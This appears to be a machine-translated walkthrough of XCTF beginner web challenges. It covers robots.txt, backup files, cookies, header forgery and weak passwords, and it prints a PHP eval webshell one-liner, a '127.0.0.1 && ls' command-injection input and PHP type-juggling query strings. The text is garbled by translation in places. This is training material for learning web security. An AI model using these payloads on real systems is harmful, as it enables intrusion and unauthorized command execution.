xctf offensive and defensive novice web world practice area --write up

view source

Topic Description: the X-Xiao Ning teacher let students view a page's source code, but Xiaoning students seem to find the right mouse button does not work.


After opening title display FLAG is not here, but subject description prompt the right mouse button does not work a. Then think of the F12 key to open the developer tools, the viewer can view the page source code. F12 ---- Viewer direct answer.

get post

** Title Description: ** X Xiao Ning teacher told the students usually use two HTTP request methods, you know what two do?

Just open the problems, claim "please use the GET method called a, the value of the variable 1", splicing usually GET side upon parameters url, text only way to pass parameters. Therefore stitching http://111.198.29.45:39706/?a=1 directly after http://111.198.29.45:39706/, output is
the way to get to submit argument and asked for "Please just another way to POST Submit named B, the value of the variable 2 ", the request submitted by post Firefox extension hackbar,

after performing output cyberpeace {xxxxxxxxxxxxxxxxxxxxxxxxx}

robots

Topic Description: X class the teacher talked about Robots agreement, Xiao Ning school students has played sleepy, hurry to teach what Xiao Ning Robots protocol is not it.

First, we learn about Robots agreement.

Robots agreement (also called crawlers agreement, robots protocol, etc.) The full name is "web crawler exclusion criteria" (Robots Exclusion Protocol), the site tells the search engines which pages can be crawled by Robots agreement, which can not crawl the page.
robots robots.txt protocol usually exist, robots.txt file is a text file, robots.txt is a protocol, not a command. robots.txt file is the first time a search engine to access the site to view. robots.txt file tells the spider what files are on the server can be viewed.

robots.txt file writing:

User-agent: * here all search engines species represented, is a wildcard
Disallow: / admin / defined here is prohibited crawling admin directory directory
Disallow: / require / defined here is prohibited crawling require directory directory
Disallow: / ABC / defined here is prohibited crawling ABC directory directory
Disallow: / cgi-bin / .htm prohibited under access / cgi-bin / directory to all ".htm" suffix URL (including subdirectories) .
Disallow: / ? * Block access to the site all URLs containing question marks (?)
Disallow: /.jpg$ of blocked pages all .jpg format images
Disallow: /ab/adc.html prohibit crawling ab folder below adc.html file.
Allow: / cgi-bin / is defined here allow crawling cgi-bin directory of directories
Allow: / tmp defined here is to allow crawling of entire tmp directory
Allow: .htm $ only allows access to ".htm" suffix URL.
Allow: .gif $ allow crawling and gif format picture
Sitemap: Sitemap tells crawlers this page is the site map

After learning robots protocol we look at this problem

Enter the following URL /robots.txt title that is given after http://111.198.29.45:49905/robots.txt display
f1ag_1s_h3re.php this page is not allowed to crawl, look f1ag_1s_h3re.php page to get the right answer

backup

Topic Description: X teacher forget to delete the backup files, he sent Xiaoning students go to find out the backup file, Xiaoning students together to help it!


After opening the topic prompted "Do you know of a backup file index.php", the backup file is usually the filename + .bak. Enter prompted to download

using Notepad ++ open to get the right answer,

cookie

Topic Description: X Xiao Ning teacher told him to put some things in a cookie, Xiao Ning puzzled to think: 'This is a biscuit mean?

Open task presenting "Do you know what a cookie do?"

Using the F12 key developer tools - network, view the message header to see the "Cookie look-here = cookie.php"

according to the message in the URL after adding "/cookie.php "That http://111.198.29.45:47420/cookie.php, view network message header to get the right answer,

disabled_button

Topics requirements: X teacher talked about today, the front-end knowledge, and then gave us a can not press the button, Xiao Ning surprised to find this button press does not go in the end how to press the go?

As shown in FIG open the problems

by developing tools to view the page source F12, using a button 'disabled=" "'Attribute, which is deleted, the button can be used normally.


Click flag button to get the correct answer,

simple js

Subject description: Xiao Ning found a webpage, but it has not lost password. (Flag format Cyberpeace {xxxxxxxxx})

open problem, there is a box Enter password, a password required, just enter "123"

input "123" as a result of

the Developer Tools F12 See page source

will analyze the code copied out JS

   function dechiffre(pass_enc){
        var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; 
        var tab  = pass_enc.split(',');
                var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;
                        k = j + (l) + (n=0);
                        n = tab2.length;
                        for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));
                                if(i == 5)break;}
                        for(i = (o=0); i < (k = j = n); i++ ){
                        o = tab[i-l];
                                if(i > 5 && i < k-1)
                                        p += String.fromCharCode((o = tab2[i]));
                        }
        p += String.fromCharCode(tab2[17]);
        pass = p;return pass;
    }
    String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

    h = window.prompt('Enter password');
    alert( dechiffre(h) );

See \ x35 \ x35 \ x2c \ x35 \ x36 \ x2c \ x35 \ x34 \ x2c \ x37 \ x39 \ x2c \ x31 \ x31 \ x35 \ x2c \ x36 \ x39 \ x2c \ x31 \ x31 \ x34 \ x2c \ x31 \ x31 \ x36 \ x2c \ x31 \ x30 \ x37 \ x2c \ x34 \ x39 \ x2c \ x35 \ x30 " thought to \% X convert the string into a URL-encoded,% 35% 35% 2c% 35% 36% 2c% 35% 34% 2c% 37% 39% 2c% 31% 31% 35% 2c% 36% 39% 2c% 31% 31% 34% 2c% 31% 31% 36% 2c% 31% 30% 37% 2c% 34% 39% 2c% 35% 30
decodes obtained: 55,56,54,79,115,69,114,116,107,49,50

these numbers ASCII code string obtained: 786OsErtk12
prompted format flag Cyberpeace {xxxxxxxxx}, submit Cyberpeace {786OsErtk12} to get the right answer.

xff referer

Topic Description: X teacher told Xiao Ning in fact xff and referer can be forged.

Open questions, tips ip address 123.123.123.123 must

use X-Forwarded-For Header tool can change the host IP address

after change ip address, the page displays "must come from https://www.google.com", where the use of burp capture , change pack (not self-tutorial Burp used)

will be caught Repeater packets to the reproducing module, a package change, add the Request "the Referer: https://www.google.com ", click on Go, the Response get an answer.

weak auth

Subject description: Xiao Ning wrote a login authentication page, to hand to set up a password.

Open questions, see a login box,

this topic is weak auth (weak authentication), the test of weak passwords, enter admin, 123456 to obtain flag (probably bursting with luck, you guessed it).

webshell

Subject description: php Xiao Ning Baidu a word, felt very interesting, and put it in index.php.

Open topic, see "webshell would you use it? <Php @eval ($ _ POST [ 'shell']);??>",
See the word horse, and Trojan horses in the title describes the cue word in index.php . Connection with a kitchen knife.

After connecting see flag.txt file.

Read flag.txt file an answer.

command execution

Subject description: Xiao Ning wrote a ping function, but did not write waf, X teacher told her it was very dangerous, you know why.

Open the topic, see the ping command,

first look at Windows and Linux command knowledge:
command1 && command2 execute command1 first and then command2 execute
command1 | command2 command2 execute only
after the first implementation of command1 & command2 command2 execute command1
Therefore, construction of the address input ping command "127.0.0.1 && ls", the command is successful

address to find the files stored flag,

read flag.txt contents of the file using the cat command.

simple php

Subject description: Xiao Ning heard php is the best language, then wrote a few lines of php code after learning she was simple.

Open title to see the source code,

source code analysis,

<?php
show_source(____FILE__ __);
include("config.php");
 //$_GET收集GET方式表单的值，对任何人可见，@屏蔽报错
$a=@$_GET['a'];   
$b=@$_GET['b'];    
if($a==0 and $a){ 
	echo $flag1;
}
//  is_numeric()函数:用于检测变量是否为数字或数字字符串,如果指定的变量是数字和数字字符串则返回TRUE，否则返回FALSE。
if(is_numeric($b)){      
    exit();
}
if($b>1234){
    echo $flag2;
}
?> `

First half: FLAG1: http://10.10.10.175:32779/index.php?a=a get
php if the type of comparison ignores the letters,
the second half: FLAG2: http://10.10.10.175:32779/index.php ? a = a & b = 1235b
get answers,